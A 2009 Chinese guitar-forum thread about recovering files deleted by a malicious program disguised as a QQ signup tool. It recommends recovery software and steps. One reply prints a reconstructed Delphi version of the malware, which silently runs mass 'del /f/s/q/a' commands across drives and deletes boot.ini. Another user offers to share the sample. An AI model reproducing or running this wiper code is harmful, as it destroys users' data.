买琴买鼓,就找魔菇!

 找回密码
 注册
搜索
查看: 2890|回复: 36

关于此次的恶意程序导致数据损失的恢复方法之我见

[复制链接]
发表于 2009-7-27 03:20:27 | 显示全部楼层 |阅读模式
吉他中国微信公众号
标题很长很帅吧, 嘿嘿

这次的这个,还真的算不上病毒或者木马,充其量算是个恶意软件,然而,却对我们造成了很大的影响。。。。。用了一个小小的DOS外部命令,作了一个图形界面,就把很多人都给耍了。。。。我本人也在帮同学们研究问题的时候不幸中招。。。。。。。嘿嘿

好吧不罗嗦了............各位可以把此方法应用到其他由于误删除导致的数据丢失以及恢复的应用当中

写在最前边的,就是如果你还想恢复,动作快是很重要的.快的意思是说,删除之后越早,对磁盘进行的操作越少,你恢复成功的机会越大.所以类似此次的事故,最重要的一点就是保护你的磁盘,不要往里边写入任何东西了.一旦你本来存放数据的空间被写入了新的数据,那再想恢复就不是一般人可以办得到的了....................

好,首先, 平时大家能见到的恢复软件有很多. 我个人用过的几种中, File Recover(下称FR)和EasyRecover(下称ER)值得推荐。这两个软件用途略有不同。FR的单个文件恢复能力较强(具体原因就不浪费篇幅了),但速度偏慢,另外对于目录结构的支持不够好。ER的速度会快很多,目录结构清晰,对于恢复保护得较好的磁盘效果好,速度快,操作也简单,缺点是对可执行文件支持不行,簇扫描能力弱。此外,Windows 自带的系统还原,如果你相关的设置做得好,一些简单的东西恢复起来也凑合,好处是不用单独找软件,缺点是。。。。。。。。他毕竟不是专业干这个的,缺点较多

OK,言归正传,此次我个人D盘全盘文件受波及,内容和结构比较复杂,我首先使用FR进行了完全的扫描。。。。用时。。。。。。。2个钟头。。。。。。确认我的关键数据都没有问题之后,我最终还是选用了ER软件作为恢复的主力。此软件汉化版在skycn有下载,大家可以去找,安全无毒。操作很简单,直接点数据恢复->删除恢复
1.JPG
接下来请选择你要进行恢复的源盘,也就是你被删的那个盘,我的是D. 关于完整扫描的作用,请仔细阅读界面上的说明.不过,无论是快速扫描,还是完整扫描, ER的速度都是很快的。

2.JPG
接下来是在左边选择你要恢复的数据,是按照目录形式来显示的,并且会按照本来的目录结构来恢复到右侧你指定的地方。这里强调强调再强调,一定不要直接恢复到你的原始盘,最好是外挂没有受影响的移动硬盘,比如我就是外挂了一块120G的USB接口移动硬盘
3.JPG
这里,请保证你的目标盘或者移动硬盘有足够的空间
4.JPG

接下来就听天由命吧。。。。。。。我的D盘在我发现问题之后立刻进行了写保护,所以可以说保护得相当完整,以至于我的所有数据全部完好无损的得到了恢复。

此外,由于上边提到的关于可执行文件的问题,我使用了windows自带的system restore作为补充,并最终再次确认数据完整之后,把E盘上得到的完整数据复制回D盘并与恢复的可执行文件进行整合,得到我原本D盘的完整数据。

这里再次提醒,Windows自带的系统恢复是很可能会破坏可恢复的删除数据的,所以请一定在确保你在另外的磁盘上已经切实的恢复好了相关数据后在做此尝试,否则。。。。。。。。。。。。。。。。后果自负吧。。。。。。。


吃一堑,长一智,嗯,以后发现问题一定描述清楚,不要再害到其他人。。。。。。。。。。比如某位同学号称这个有病毒。。。。。。。。然后说运行之后就看不到文件夹里的东西了。。。。。。。。因为之前有过一个或者一些病毒就是伪造Explorer致使浏览文件受阻的,我就被误导了。。。。同时由于该软件的UI是申请QQ号码的界面,我的第一想法是这可能是一个盗号类的木马。。。。。。。。。。总之,同学们在报告问题的时候一定先理清思路把问题说清楚。一些基本的电脑常识,比如察看磁盘的属性,或者监视不正常进程的方法,还是有必要作为常识来了解的。。。

祝大家都能拿回自己的数据。并祝好梦。
发表于 2009-7-27 03:27:21 | 显示全部楼层
吉他中国抖音
MAC OSX和LINUX的人路过

LINUX下用虚拟的XP也挺好。
 楼主| 发表于 2009-7-27 03:38:02 | 显示全部楼层

回复 2# 陶瓷清爽 的帖子

GC视频号
走出实验室就不用Linux了。。。。。。。。。。。比较排斥。。。。。。。。。。。

Mac平台的东西毕竟还是少。。。。。。。。而且苹果的电脑近些年来性价比越来越差了。。。。。。。。。。。
 楼主| 发表于 2009-7-27 03:40:25 | 显示全部楼层
买琴买鼓,就找魔菇
好了,我睡了。。。。。。。。。。。我这里是中国。。。。。。。。凌晨快4点了。。。。。。。。

Bonsoir~~~
发表于 2009-7-27 03:48:44 | 显示全部楼层
苹果装双系统的兼容性怎么样啊?

苹果的笔记本用来作图和台式机区别大不?    和其他品牌差不多配制的笔记本区别大不?
发表于 2009-7-27 03:53:18 | 显示全部楼层
夜里或上床前要说
bonne nuit
发表于 2009-7-27 03:55:01 | 显示全部楼层
原帖由 幸亏没学拉二胡 于 2009-7-26 20:48 发表
苹果装双系统的兼容性怎么样啊?

苹果的笔记本用来作图和台式机区别大不?    和其他品牌差不多配制的笔记本区别大不?


现在只要是用英特尔处理器的都可以装WINDOWS,没有任何兼容性问题。

作图的差距还是蛮大的
运算处理的性能上还是MAC好些
不过现在差距在逐渐缩小
CPU+GPU的时代已经来临
分布式计算已经悄然进入寻常百姓家
 楼主| 发表于 2009-7-27 03:57:18 | 显示全部楼层

回复 6# 陶瓷清爽 的帖子

您那也是夜里了吗.......................................原来我这里天都快亮了。。。。。。。。。。。。。。。。饿。。。。。。。。。。。。。。。。。。。。。。闪

[ 本帖最后由 SoulReaper 于 2009-7-27 04:00 编辑 ]
发表于 2009-7-27 03:57:51 | 显示全部楼层
原帖由 陶瓷清爽 于 2009-7-27 03:55 发表


现在只要是用英特尔处理器的都可以装WINDOWS,没有任何兼容性问题。

作图的差距还是蛮大的
运算处理的性能上还是MAC好些
不过现在差距在逐渐缩小
CPU+GPU的时代已经来临
分布式计算已经悄然进入寻常百姓家 ...

那陶瓷兄, 现在如果是专业做设计的有必要非买苹果吗? 你说的MAC包括MACBOOK吗?
发表于 2009-7-27 04:00:16 | 显示全部楼层
我这边已经是十点了
可以说是入夜了
一般好孩子都要去睡觉了:)
发表于 2009-7-27 04:06:30 | 显示全部楼层
原帖由 幸亏没学拉二胡 于 2009-7-26 20:57 发表

那陶瓷兄, 现在如果是专业做设计的有必要非买苹果吗? 你说的MAC包括MACBOOK吗?


我这边认识的所有专业做设计的,都用苹果
包括音频,视频,图形图像,广告,装潢,展览等等都是苹果的。
速度上还是差距很大的。
而且很多软件必须要在MAC下使用。

不过现在分布式技术应用在PC机上还是蛮强大的
但是最专业的软件还都是运行在MAC机上的
并且消耗的资源超多。
如果你为了便携,还是买一般的PC笔记本吧。MACBOOK在运算性能上不会好过高配置的PCBOOK的。
现在GPU处理图像运算的功能越来越强,显卡厂家的设计也逐步在提升。

GPU+CPU的个人PC机器“新”理念,今年年底就应该在个人PC市场全面爆发了。
发表于 2009-7-27 08:51:44 | 显示全部楼层
等会研究一下,那么多数据上哪找去?
发表于 2009-7-27 09:31:51 | 显示全部楼层
按照楼主说的办法,果然好了,还有一些很早以前我自己删除的文件也恢复过来了,超额完成,哈哈,赞一个
发表于 2009-7-27 09:49:52 | 显示全部楼层
谢谢楼主 20个G的毛片又回来了
发表于 2009-7-27 11:22:01 | 显示全部楼层
原帖由 ctadj123 于 2009-7-27 09:49 发表
谢谢楼主 20个G的毛片又回来了


我倒不是要恢复毛片,我很多工作资料被删了,现在都好了
发表于 2009-7-27 12:09:35 | 显示全部楼层
版主,我又发现新问题,数据是都恢复了,但所有的excel表格word文档都是乱码,图片也打不开,部分exe文件无法执行

[ 本帖最后由 rainbow6 于 2009-7-27 12:12 编辑 ]
发表于 2009-7-27 12:47:22 | 显示全部楼层
這是啥狀況?
出什麽事了嗎周末?
@_@
发表于 2009-7-27 12:48:47 | 显示全部楼层

回复 17# 魔音 的帖子

还好版主及时封贴,没造成大面积损失
 楼主| 发表于 2009-7-27 13:16:52 | 显示全部楼层

回复 16# rainbow6 的帖子

说明有些文档被其它数据部分覆盖了,所以恢复出来的文件也不完整了。。。。。。。

我记得还有一些其他的工具专门是修复文档的,就是修复这些从磁盘恢复得到的office文档。你可以google一下。不过我没有使用过,没什么经验
发表于 2009-7-27 13:35:37 | 显示全部楼层

回复 1# SoulReaper 的帖子

呵呵~我对您的说法非常不满意...我告诉大家程序有毒别下~~结果您仗着自己水平高技术硬非要试一试,中招了来责备我....不滑稽么?
 楼主| 发表于 2009-7-27 13:45:42 | 显示全部楼层

回复 20# Ag187lxy 的帖子

.........................算不上责备吧...............只是还可以描述得更清楚一点................
发表于 2009-7-27 14:21:24 | 显示全部楼层
妈了个巴子的,总算恢复了。
这病毒我还有,谁要玩玩?
虚拟机上截图。

100.gif
发表于 2009-7-27 14:29:14 | 显示全部楼层
反汇编看了一下,用DELPHI模拟还原了一下代码。主要程序大概如下,阴险的是,程序从双击启动开始就不停的删除D-K盘的所有文件(保留文件夹),而整个软件界面和按钮、进度条都是掩饰物拖延时间,好防止用户退出,让病毒能删更多的文件。

procedure TForm1.FormCreate(Sender: TObject);
begin
  WinExec('cmd /C del C:\boot.ini /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del D:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del E:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del F:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del G:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del H:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del I:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del J:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del K:\*.* /f/s/q/a',SW_HIDE);
end;
 楼主| 发表于 2009-7-27 15:09:26 | 显示全部楼层

回复 23# 无名男尸 的帖子

嗯,我也反编译过了 我个人不得不佩服这个想法......轻易的绕过了所有保护措施..............呵呵
发表于 2009-7-27 16:11:39 | 显示全部楼层
牛人啊,这个思路不错。
发表于 2009-7-27 18:57:57 | 显示全部楼层
编这东西的人智慧用错了地方,把脑子都用来找骂了
发表于 2009-7-27 19:35:21 | 显示全部楼层
生儿子绝对没有屁眼啊,就发病毒的那个人,哈哈哈哈哈哈!等你让车撞了,老婆死了,哈哈哈,你的脑海里就会浮现出我幸灾乐祸的表情,你记住了,总有一天你会遇到血灾!
发表于 2009-7-27 20:05:13 | 显示全部楼层
未命名.jpg 这样是不是 就没救了?

[ 本帖最后由 易燃 于 2009-7-27 20:06 编辑 ]
发表于 2009-7-27 20:09:39 | 显示全部楼层
在公司发现后我还想呢  还好家里有备份 结果.....................
公司库存的文件 ...............
现在我的照片什么的已经不想了
怎么向公司交代....................
发表于 2009-7-27 20:14:38 | 显示全部楼层
原帖由 易燃 于 2009-7-27 20:05 发表
957674这样是不是 就没救了?


我的excel文件,word文档,都是这个样子。照片也打不开,大部分的exe文件不能执行
发表于 2009-7-27 20:14:44 | 显示全部楼层
深奥的东西 ~
 楼主| 发表于 2009-7-27 20:28:55 | 显示全部楼层
各位难道没有忍不住往硬盘里写过数据???????
发表于 2009-7-27 20:38:31 | 显示全部楼层

回复 32# SoulReaper 的帖子


太邪恶了这句
我以前硬盘挂过两次,想想深山红叶一个版本里面一个工具挺好用的,比ER还好用
发表于 2009-7-27 20:39:34 | 显示全部楼层
原帖由 SoulReaper 于 2009-7-27 20:28 发表
各位难道没有忍不住往硬盘里写过数据???????


绝对没写过
发表于 2009-7-27 20:45:14 | 显示全部楼层
没有        
忽然感觉 后背发冷
都因为我的一时疏忽 酿成大祸
 楼主| 发表于 2009-7-27 23:10:56 | 显示全部楼层

回复 33# koy2012 的帖子

深山红叶的那个, 恢复数据的成功率还不如Easy Recover...............真的........................我在公司带着几个小第做过测试的。。。。。。。。。。。

当然最高级的技术就是送到厂里直接读磁信号去,那个再恢复不出来就彻底没戏了
发表于 2009-7-27 23:12:40 | 显示全部楼层
一看就是高计算机的人才,羡慕
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|吉他中国官方

GMT+8, 2025-2-5 08:48

Powered by Discuz!

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表